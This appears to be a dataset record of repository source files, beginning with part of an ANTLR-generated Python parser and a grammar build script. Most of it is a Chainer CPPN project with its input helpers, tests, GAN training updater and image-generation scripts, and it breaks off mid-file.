self._interp.adaptivePredict(self._input,29,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 369\n self.function_call()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 370\n self.expr8()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr8Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr8\n\n\n\n\n def expr8(self):\n\n localctx = BKITParser.Expr8Context(self, self._ctx, self.state)\n self.enterRule(localctx, 76, self.RULE_expr8)\n try:\n self.state = 378\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 1)\n self.state = 373\n self.operand()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 374\n self.match(BKITParser.LEFT_PAREN)\n self.state = 375\n self.expr()\n self.state = 376\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, 
parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self):\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def composite_data(self):\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 78, self.RULE_operand)\n try:\n self.state = 383\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 380\n self.var_non_init()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.enterOuterAlt(localctx, 2)\n self.state = 381\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 3)\n self.state = 382\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_callContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n 
if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_call\n\n\n\n\n def function_call(self):\n\n localctx = BKITParser.Function_callContext(self, self._ctx, self.state)\n self.enterRule(localctx, 80, self.RULE_function_call)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 385\n self.match(BKITParser.ID)\n self.state = 386\n self.match(BKITParser.LEFT_PAREN)\n self.state = 397\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 387\n self.expr()\n self.state = 392\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 388\n self.match(BKITParser.COMMA)\n self.state = 389\n self.expr()\n self.state = 394\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 399\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 400\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Index_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACKET(self):\n return self.getToken(BKITParser.LEFT_BRACKET, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_BRACKET(self):\n return self.getToken(BKITParser.RIGHT_BRACKET, 0)\n\n 
def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_index_op\n\n\n\n\n def index_op(self):\n\n localctx = BKITParser.Index_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 82, self.RULE_index_op)\n try:\n self.state = 411\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,34,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 402\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 403\n self.expr()\n self.state = 404\n self.match(BKITParser.RIGHT_BRACKET)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 406\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 407\n self.expr()\n self.state = 408\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 409\n self.index_op()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[31] = self.expr1_sempred\n self._predicates[32] = self.expr2_sempred\n self._predicates[33] = self.expr3_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr3_sempred(self, localctx:Expr3Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.6402116417884827, "alphanum_fraction": 0.6560846567153931, 
"avg_line_length": 14.666666984558105, "blob_id": "63f8b4988373d0e177ea25cb2d03a967a2a17490", "content_id": "ae0a28bd7ea2a50080392e096d56f2ab96b7236a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 189, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/SyntaxAnalysis/gen.sh", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ $# -eq 0 ]\n\tthen \n\t\tread -p 'Grammar name : ' grammar_name\n\telse\n\t\tgrammar_name=$1\nfi\n\njava -jar $ANTLR_JAR $grammar_name.g4\njavac $grammar_name*.java\necho $grammar_name \n" } ]
83
kzmssk/cppn
https://github.com/kzmssk/cppn
e6aa202dad10c3397f8ad7d403e9d59f8775ec02
6ef32c6e05f16826635fe6cb70fc43d5f3d91b98
67e9d8c5179aa6e4ca423f96fa53e8964f06cfa7
refs/heads/master
2022-11-27T13:44:13.343063
2019-11-03T07:55:02
2019-11-03T07:55:02
211,906,839
0
0
null
2019-09-30T16:40:26
2019-11-04T08:22:24
2022-11-22T04:34:29
Python
[ { "alpha_fraction": 0.561020016670227, "alphanum_fraction": 0.5846994519233704, "avg_line_length": 32.61224365234375, "blob_id": "fa39f9bfcab27120f4ae80e0476c5dfa66ea02b8", "content_id": "1b06e7ac98ef4cff9733a6c904c104f874a03e28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1647, "license_type": "no_license", "max_line_length": 106, "num_lines": 49, "path": "/cppn/input_data.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import dataclasses\n\nimport numpy\nfrom scipy.stats import truncnorm\n\n\ndef truncated_normal(x, a=-1, b=1, mean=0.5, std=0.2):\n \"\"\" Normal dist. [a, b] \"\"\"\n return truncnorm.pdf(x, (a - mean) / std, (b - mean) / std, loc=mean, scale=std).astype(numpy.float32)\n\n\ndef sample_z(z_size):\n return truncated_normal(numpy.random.rand(z_size))\n\n\ndef interp_z(z1, z2, n_points):\n \"\"\" Linear interpolation between z1 and z2 \"\"\"\n return [a * z1 + (1.0 - a) * z2 for a in numpy.linspace(0, 1, n_points)]\n\n\[email protected]\nclass InputData:\n \"\"\" Helper class to generate inputs for CPPN \"\"\"\n width: int\n height: int\n z_size: int\n\n def __post_init__(self):\n \"\"\" Initialize x, y, and r \"\"\"\n assert self.width > 0\n assert self.height > 0\n self.x, self.y = numpy.meshgrid(\n numpy.linspace(0, 1, self.width).astype(numpy.float32),\n numpy.linspace(0, 1, self.height).astype(numpy.float32))\n self.r = numpy.sqrt(numpy.square(self.x) + numpy.square(self.y))\n\n def as_batch(self, z=None):\n \"\"\" Return x, y, r, z as batch [width * height, 3 + z_size] \"\"\"\n if z is None:\n z = sample_z(self.z_size)\n assert z.shape == (self.z_size, )\n\n return numpy.concatenate((self.x.reshape(-1, 1), self.y.reshape(-1, 1), self.r.reshape(-1, 1)),\n axis=1), numpy.tile(z, (self.width * self.height, 1))\n\n def sample_z(self, batch_size):\n \"\"\" sample batch of z \"\"\"\n z = [numpy.tile(sample_z(self.z_size), (self.width * self.height, 1)) for _ in 
range(batch_size)]\n return numpy.concatenate(z, axis=0)\n" }, { "alpha_fraction": 0.536796510219574, "alphanum_fraction": 0.6017315983772278, "avg_line_length": 22.100000381469727, "blob_id": "765632c52a9b912c4a0f70193dcb190f7c8f9feb", "content_id": "b0fd1ff9022ad54a4275c595623cdbe689ff4ce9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 51, "num_lines": 10, "path": "/test/test_input_data.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "from cppn.input_data import InputData\n\n\ndef test_input_data():\n data = InputData(width=12, height=14, z_size=2)\n x, z = data.as_batch()\n\n # check shape\n assert x.shape == (12 * 14, 3)\n assert z.shape == (12 * 14, 2)\n" }, { "alpha_fraction": 0.6357588171958923, "alphanum_fraction": 0.6432432532310486, "avg_line_length": 28.703702926635742, "blob_id": "392b548db8c34764fa2fa80d871cdcfca288f7dc", "content_id": "2470a6977c74891d6cd9fd8fcc8f234052a05fab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2405, "license_type": "no_license", "max_line_length": 108, "num_lines": 81, "path": "/experiments/gen_images.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "# import CPPN modules\nimport sys # isort:skip\nimport os # isort:skip\nsys.path.append(os.getcwd()) # isort:skip\n\nimport argparse\nimport os\nimport sys\nfrom pathlib import Path\n\nimport numpy\nfrom PIL import Image\n\nfrom cppn.input_data import InputData, interp_z, sample_z\nfrom cppn.model import CPPN, ModelConfig\nfrom cppn.post_process_output import post_process_output\nimport chainer\n\n\ndef gen_images():\n parser = argparse.ArgumentParser(description=\"multiple images as single image\")\n parser.add_argument('--out', type=Path, default=Path('./tmp/out.png'))\n parser.add_argument('--n_rows', type=int, default=5)\n parser.add_argument('--n_cols', type=int, 
default=5)\n parser.add_argument('--model_config_path', type=Path, default=Path('./conf/model.yaml'))\n parser.add_argument('--gpu', type=int, default=-1)\n parser.add_argument('--load', type=Path)\n parser.add_argument('--size', type=int)\n args = parser.parse_args()\n\n batch_size = args.n_rows * args.n_cols\n\n # init model\n model_config = ModelConfig.load(args.model_config_path)\n model = CPPN(model_config)\n\n # override size of output\n if args.size:\n model_config.width = args.size\n model_config.height = args.size\n\n if args.load:\n assert args.load.exists()\n print(f\"load model from {args.load}\")\n chainer.serializers.load_npz(args.load, model)\n\n # model to gpu\n if args.gpu >= 0:\n chainer.cuda.get_device_from_id(args.gpu).use()\n model.to_gpu()\n\n # init x and z\n input_data = InputData(width=model_config.width, height=model_config.height, z_size=model_config.z_size)\n\n x, z = [], []\n for _ in range(batch_size):\n _x, _z = input_data.as_batch()\n x.append(_x)\n z.append(_z)\n\n x = numpy.concatenate(x)\n z = numpy.concatenate(z)\n\n # to device\n xp = model.xp\n x = chainer.Variable(xp.asarray(x))\n z = chainer.Variable(xp.asarray(z))\n\n y = model.forward(x, z)\n y = chainer.cuda.to_cpu(y.data)\n\n # chainer variable [B, 1, W, H], float [0, 1] -> numpy array uint8 [0, 255]\n y = post_process_output(y)\n y = y.reshape((args.n_rows, args.n_cols, 1, input_data.height, input_data.width))\n y = y.transpose((0, 3, 1, 4, 2))\n y = y.reshape((args.n_rows * input_data.height, args.n_cols * input_data.width))\n Image.fromarray(y).save(args.out)\n\n\nif __name__ == '__main__':\n gen_images()" }, { "alpha_fraction": 0.4997383654117584, "alphanum_fraction": 0.5206698179244995, "avg_line_length": 30.327869415283203, "blob_id": "cea955c54ccfc83a8bacece13ec3b62b71c75094", "content_id": "cd7fa6e4cf5fdb6f933c0c219415ab04a3ea2f6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1911, "license_type": 
"no_license", "max_line_length": 111, "num_lines": 61, "path": "/test/test_forward.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import numpy\n\nfrom cppn.conditional_model import ConditionalCPPN, ConditionalModelConfig\nfrom cppn.input_data import InputData\nfrom cppn.model import CPPN, ModelConfig\n\n\ndef get_dammy_input(batch, width, height, channel):\n x = numpy.random.rand(batch, channel, width, height) # [0, 1]\n x *= 255\n return x.astype(numpy.float32)\n\n\ndef test_unconditional_forward():\n width = 5\n height = 7\n z_size = 2\n batch_size = 3\n\n model = CPPN(ModelConfig(width=width, height=height, n_units_xyrz=3, n_hidden_units=[5, 5], z_size=z_size))\n\n x, z = [], []\n for _ in range(batch_size):\n _x, _z = InputData(width=width, height=height, z_size=z_size).as_batch()\n x.append(_x)\n z.append(_z)\n x = numpy.concatenate(x, axis=0)\n z = numpy.concatenate(z, axis=0)\n\n y = model.forward(x, z)\n assert y.shape == (batch_size, 1, width, height)\n\n\ndef test_conditional_forward():\n width = 5\n height = 7\n z_size = 2\n batch_size = 3\n batch_size = 3\n model = ConditionalCPPN(\n ConditionalModelConfig(width=width,\n height=height,\n n_units_xyr=3,\n n_hidden_units=[\n 10,\n 10,\n ],\n z_size=z_size,\n in_width=64,\n in_height=64,\n in_channel=1))\n x, z = [], []\n for _ in range(batch_size):\n _x, _z = InputData(width=width, height=height, z_size=z_size).as_batch()\n x.append(_x)\n z.append(_z)\n x = numpy.concatenate(x, axis=0)\n z = numpy.concatenate(z, axis=0)\n c = get_dammy_input(batch_size, 64, 64, 1) # init dammy conditional input\n y = model.forward(x, z, c)\n assert y.shape == (batch_size, 1, width, height)\n" }, { "alpha_fraction": 0.6698873043060303, "alphanum_fraction": 0.6744254231452942, "avg_line_length": 39.90419006347656, "blob_id": "99fa16f3411497fa4ccf52ffdc3bfe36134f70bb", "content_id": "3a48efc0b8bc1af36a9aaee2b378ae9410bd753f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 6831, "license_type": "no_license", "max_line_length": 160, "num_lines": 167, "path": "/experiments/train.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "\"\"\" Train CPPN model with image dataset \"\"\"\n# import CPPN modules\nimport sys # isort:skip\nimport os # isort:skip\nsys.path.append(os.getcwd()) # isort:skip\n\nimport typing\n\nimport argparse\nimport dataclasses\nimport shutil\nfrom pathlib import Path\n\nimport chainer\nfrom chainer import training\nfrom chainer.training import extension, extensions\n\nfrom cppn import (config_base, model, my_dataset, my_updater, sn_discriminator,\n trainer_util)\nfrom cppn.model import ModelConfig\n\nfrom cppn.mnist_dataset import MnistDataset\nfrom cppn.emnist_dataset import EMnistDataset\n\n\[email protected]\nclass TrainConfig(config_base.ConfigBase):\n \"\"\" Training configuration \"\"\"\n max_iter: int # max number of training iteration\n batch_size: int\n snapshot_iter_interval: int\n display_iter_interval: int\n evaluation_iter_interval: int\n n_discriminator_update: int\n display_iter_interval: int\n emnist_data_path: str\n dataset_type: str = 'original'\n train_image_dir_path: typing.Optional[Path] = None # root directory of image files\n train_image_path_txt: typing.Optional[Path] = None # path to text files of image file paths\n alpha: float = 0.0002 # alpha of adam optimizer\n beta1: float = 0.0 # beta1 of adam optimizer\n beta2: float = 0.9 # beta2 of adam optimizer\n discriminator_ch_size: int = 24 # size of discriminator filter\n\n\ndef init_optimizer(model, alpha, beta1, beta2):\n \"\"\" initialize optimizer with model \"\"\"\n opt = chainer.optimizers.Adam(alpha=alpha, beta1=beta1, beta2=beta2)\n opt.setup(model)\n return opt\n\n\ndef train(log_dir_path: Path, train_config: TrainConfig, model_config: model.ModelConfig, load: typing.Optional[Path]=None, device: int=-1):\n \"\"\" Train CPPN model on image dataset \"\"\"\n # init dataset\n\n \n # init dataset\n 
if train_config.dataset_type == 'mnist':\n train_dataset = MnistDataset(width=model_config.width, height=model_config.height, z_size=model_config.z_size)\n elif train_config.dataset_type == 'emnist':\n assert train_config.emnist_data_path is not None, \"emnist_data_path should be specified\"\n train_dataset = EMnistDataset(width=model_config.width, height=model_config.height, z_size=model_config.z_size, data_path=train_config.emnist_data_path)\n elif train_config.dataset_type == 'original':\n # init path of image files\n if train_config.train_image_dir_path is not None:\n paths = list(train_config.train_image_dir_path.glob('*.jpg')) # TODO: take also PNG images\n elif train_config.train_image_path_txt is not None:\n with open(train_config.train_image_path_txt) as f:\n paths = f.readlines()\n paths = [ p.split('\\n')[0] for p in paths ]\n else:\n raise RuntimeError('train_image_dir_path or train_image_path_txt should be specified')\n train_dataset = my_dataset.MyDataset(paths, model_config.width, model_config.height, model_config.z_size)\n else:\n raise NotImplementedError\n\n train_iterator = chainer.iterators.SerialIterator(train_dataset, train_config.batch_size)\n\n # init generator\n generator = model.CPPN(model_config)\n\n if load:\n chainer.serializers.load_npz(load, generator)\n\n # init discriminator\n discriminator = sn_discriminator.SNDiscriminator(ch=train_config.discriminator_ch_size)\n \n print(f\"generator size = {generator.count_params()}, discriminator_size = {discriminator.count_params()}\")\n\n # copy model to device\n if device >= 0:\n chainer.cuda.get_device_from_id(device).use()\n generator.to_gpu()\n discriminator.to_gpu()\n\n # init optimizers\n gen_opt = init_optimizer(generator, train_config.alpha, train_config.beta1, train_config.beta2)\n dis_opt = init_optimizer(discriminator, train_config.alpha, train_config.beta1, train_config.beta2)\n\n # init updater\n updater = my_updater.MyUpdater(iterator=train_iterator,\n gen=generator,\n 
dis=discriminator,\n gen_opt=gen_opt,\n dis_opt=dis_opt,\n input_data=train_dataset.input_data,\n n_discriminator_update=train_config.n_discriminator_update,\n device=device)\n trainer = training.Trainer(updater, (train_config.max_iter, 'iteration'), out=log_dir_path)\n\n # --- init updater's hooks (logging)\n # snapshot of models\n trainer.extend(extensions.snapshot_object(generator, 'generator_{.updater.iteration}.npz'),\n trigger=(train_config.snapshot_iter_interval, 'iteration'))\n trainer.extend(extensions.snapshot_object(discriminator, 'discriminator_{.updater.iteration}.npz'),\n trigger=(train_config.snapshot_iter_interval, 'iteration'))\n\n # report log\n report_keys = [\"loss_dis\", \"loss_gen\"]\n trainer.extend(extensions.LogReport(keys=report_keys, trigger=(train_config.display_iter_interval, 'iteration')))\n trainer.extend(extensions.PrintReport(report_keys), trigger=(train_config.display_iter_interval, 'iteration'))\n trainer.extend(trainer_util.sample_generate(generator, log_dir_path, train_dataset.input_data),\n trigger=(train_config.evaluation_iter_interval, 'iteration'),\n priority=extension.PRIORITY_WRITER)\n trainer.extend(extensions.ProgressBar(update_interval=10))\n\n # start training\n trainer.run()\n\n\ndef start_train():\n parser = argparse.ArgumentParser(description=\"Training CPPN model\")\n parser.add_argument('log_dir_path', type=Path)\n parser.add_argument('--train_config_path', type=Path, default='./conf/train.yaml')\n parser.add_argument('--model_config_path', type=Path, default='./conf/model.yaml')\n parser.add_argument('--load', type=Path)\n parser.add_argument('--device', type=int, default=0)\n parser.add_argument('--overwrite', action='store_true')\n args = parser.parse_args()\n\n # init log_dir\n args.log_dir_path.mkdir(parents=False, exist_ok=args.overwrite)\n\n # load train config\n train_config = TrainConfig.load(args.train_config_path)\n\n # load model config\n model_config = ModelConfig.load(args.model_config_path)\n\n # 
check load\n if args.load:\n assert args.load.exists()\n\n # store execution info to log_dir\n trainer_util.snap_exec_info(args.log_dir_path, args)\n\n # copy configs to log dir\n shutil.copyfile(args.train_config_path, args.log_dir_path / args.train_config_path.name)\n shutil.copyfile(args.model_config_path, args.log_dir_path / args.model_config_path.name)\n\n # start train\n train(args.log_dir_path, train_config, model_config, args.load, args.device)\n\n\nif __name__ == '__main__':\n start_train()\n" }, { "alpha_fraction": 0.6293706297874451, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 19.428571701049805, "blob_id": "ba446438902b7acbd6c6e0923bc241692e2166b0", "content_id": "f9f83c9d4a6d08dfe1a66bb26e0356681c28e755", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 572, "license_type": "no_license", "max_line_length": 72, "num_lines": 28, "path": "/test/test_discriminator.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport numpy\n\nfrom cppn import sn_discriminator\n\n\ndef get_dammy_input(batch, width, height, channel):\n x = numpy.random.rand(batch, channel, width, height) # [0, 1]\n x *= 255\n return x.astype(numpy.float32)\n\n\ndef test_forward():\n batch = 1\n width = 64\n height = 64\n channel = 1\n\n # init model\n discriminator = sn_discriminator.SNDiscriminator()\n\n # init dammy input\n x = chainer.Variable(get_dammy_input(batch, width, height, channel))\n\n # forward prop\n y = discriminator.forward(x)\n\n assert y.shape == (batch, 1)\n" }, { "alpha_fraction": 0.5688003301620483, "alphanum_fraction": 0.5703334808349609, "avg_line_length": 36.81159591674805, "blob_id": "7cd20b97336bfe0621579fc5874a5e823b5df5b0", "content_id": "4d7389279ad01189794b132d7bd2a63444f138ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2609, "license_type": "no_license", "max_line_length": 103, "num_lines": 
69, "path": "/cppn/my_updater.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "import chainer\nimport chainer.functions as F\nimport numpy\n\nfrom cppn import input_data, model\n\n\nclass MyUpdater(chainer.training.StandardUpdater):\n \"\"\" Update discriminator and generator with unconditional generation \"\"\"\n def __init__(self, iterator: chainer.iterators.SerialIterator, gen: model.CPPN, dis: chainer.Chain,\n gen_opt: chainer.optimizer.Optimizer, dis_opt: chainer.optimizer.Optimizer,\n input_data: input_data.InputData, n_discriminator_update: int, device: int):\n self.generator = gen\n self.discriminator = dis\n self.gen_opt = gen_opt\n self.dis_opt = dis_opt\n self.input_data = input_data\n self.n_discriminator_update = n_discriminator_update\n\n optimizers = {'gen_opt': gen_opt, 'dis_opt': dis_opt}\n iterator = {'main': iterator}\n super(MyUpdater, self).__init__(iterator=iterator, optimizer=optimizers, device=device)\n\n def update_core(self):\n gen_opt = self.get_optimizer('gen_opt')\n dis_opt = self.get_optimizer('dis_opt')\n xp = self.generator.xp\n\n for i in range(self.n_discriminator_update):\n batch = self.get_iterator('main').next()\n batch_size = len(batch)\n x, z, c = [], [], []\n for b in batch:\n x.append(b[0])\n z.append(b[1])\n c.append(b[2])\n\n # ndarray -> variable\n x = chainer.Variable(xp.asarray(numpy.concatenate(x)))\n z = chainer.Variable(xp.asarray(numpy.concatenate(z)))\n c = chainer.Variable(xp.asarray(numpy.concatenate(c)))\n\n if i == 0:\n # generator\n x_fake = self.generator.forward(x, z)\n y_fake = self.discriminator.forward(x_fake)\n loss_gen = F.sum(F.softplus(-y_fake)) / batch_size\n self.generator.cleargrads()\n loss_gen.backward()\n gen_opt.update()\n chainer.reporter.report({'loss_gen': loss_gen})\n\n y_real = self.discriminator.forward(c)\n\n z = self.input_data.sample_z(batch_size)\n z = chainer.Variable(xp.asarray(z))\n\n x_fake = self.generator(x, z)\n y_fake = self.discriminator(x_fake)\n 
x_fake.unchain_backward()\n\n loss_dis = F.sum(F.softplus(-y_real)) / batch_size\n loss_dis += F.sum(F.softplus(y_fake)) / batch_size\n\n self.discriminator.cleargrads()\n loss_dis.backward()\n dis_opt.update()\n\n chainer.reporter.report({'loss_dis': loss_dis})\n" }, { "alpha_fraction": 0.598531186580658, "alphanum_fraction": 0.6070991158485413, "avg_line_length": 29.259260177612305, "blob_id": "e4451a853cd4e89abc977f47ec5964300ed5afdc", "content_id": "918779ef28a582aa78e419ac15f23cc2002f1bcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 817, "license_type": "no_license", "max_line_length": 71, "num_lines": 27, "path": "/experiments/extract_image_paths.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "from pathlib import Path\nimport argparse\nimport numpy\n\ndef extract_image_paths(target_dir_path: Path, out_path: Path, N: int):\n \"\"\" Extract N file paths from taret_dir_path \"\"\"\n n = 0\n with open(out_path, 'w') as f:\n for target in target_dir_path.glob('*.jpg'):\n f.write(str(target) + '\\n')\n n += 1\n if n >= N:\n break\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('target_dir_path', type=Path)\n parser.add_argument('out_path', type=Path)\n parser.add_argument('--n', type=int, default=10000)\n args = parser.parse_args()\n\n # check arguments\n assert args.target_dir_path.exists()\n assert args.out_path.parent.exists()\n\n extract_image_paths(args.target_dir_path, args.out_path, args.n)\n" }, { "alpha_fraction": 0.5979652404785156, "alphanum_fraction": 0.6048572659492493, "avg_line_length": 26.95412826538086, "blob_id": "b80a64b5ac1e8b50995b76b9597656e160c9dbb4", "content_id": "ed5163dfb46112b3897939c830c40328c8526485", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3047, "license_type": "no_license", "max_line_length": 108, "num_lines": 109, "path": 
"/experiments/interp_movie.py", "repo_name": "kzmssk/cppn", "src_encoding": "UTF-8", "text": "\"\"\" Genarate GIF movie of latent space linear interpolation with untrained model \"\"\"\n# import CPPN modules\nimport sys # isort:skip\nimport os # isort:skip\nsys.path.append(os.getcwd()) # isort:skip\n\n\nimport argparse\nimport os\nimport sys\nfrom pathlib import Path\n\nimport numpy\nfrom PIL import Image\n\nfrom cppn.input_data import InputData, interp_z, sample_z\nfrom cppn.model import CPPN, ModelConfig\nfrom cppn.post_process_output import post_process_output\nimport chainer\n\n\n\ndef interp_movie():\n parser = argparse.ArgumentParser(description=\"Gen gif movie\")\n parser.add_argument('--out', type=Path, default=Path('./tmp/out.gif'))\n parser.add_argument('--frames', type=int, default=10)\n parser.add_argument('--z_points', type=int, default=10)\n parser.add_argument('--batch_size', type=int, default=50)\n parser.add_argument('--model_config_path', type=Path, default=Path('./conf/model.yaml'))\n parser.add_argument('--gpu', type=int, default=-1)\n parser.add_argument('--load', type=Path)\n parser.add_argument('--size', type=int)\n args = parser.parse_args()\n\n # create directory to put result\n args.out.parent.mkdir(exist_ok=True)\n\n # init model\n model_config = ModelConfig.load(args.model_config_path)\n\n # override size of output\n if args.size:\n model_config.width = args.size\n model_config.height = args.size\n\n model = CPPN(model_config)\n\n if args.load:\n assert args.load.exists()\n print(f\"load model from {args.load}\")\n chainer.serializers.load_npz(args.load, model)\n\n # model to gpu\n if args.gpu >= 0:\n chainer.cuda.get_device_from_id(args.gpu).use()\n model.to_gpu()\n\n # init x and z\n input_data = InputData(width=model_config.width, height=model_config.height, z_size=model_config.z_size)\n\n # gen frames\n images = []\n \n zs = []\n for _ in range(args.z_points):\n zs.extend(\n interp_z(sample_z(model_config.z_size), 
